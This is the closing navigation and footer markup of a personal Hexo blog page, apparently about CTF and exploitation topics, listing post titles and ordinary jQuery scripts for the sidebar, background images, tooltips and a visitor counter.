href="/2016/09/24/%E4%B8%80%E4%BA%9B%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE%E9%81%87%E5%88%B0%E7%9A%84%E5%9D%91-%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/">一些环境配置遇到的坑(持续更新)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/09/16/Malloc-Maleficarum-%E5%A4%8D%E7%9B%98/">Malloc-Maleficarum-复盘</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/26/%E5%88%9D%E8%AF%95winafl/">初试winafl</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/14/pwnable-kr-alloca/">pwnable.kr -- alloca</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/01/%E7%AE%80%E5%8D%95%E7%9A%84%E5%B0%9D%E8%AF%95angr/">简单的尝试angr</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/06/29/%E7%AC%AC%E4%B8%80%E4%B8%AAandroid-cm%E8%B0%83%E8%AF%95%E5%88%86%E6%9E%90/">第一个android cm调试分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/06/29/install-gef/">install gef</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/04/30/cctf-pwn350/">cctf pwn350</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/02/15/heap-vuln-unlink/">heap vuln -- unlink</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/12/02/format-string-with-stack-frame/">format string with stack frame</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/11/16/RCTF-PWN200/">RCTF -- PWN200</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/11/05/dragon/">dragon</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2019 muhe
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/luuman/hexo-theme-spfk" target="_blank">spfk</a> by luuman
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >访客数量: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 24;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>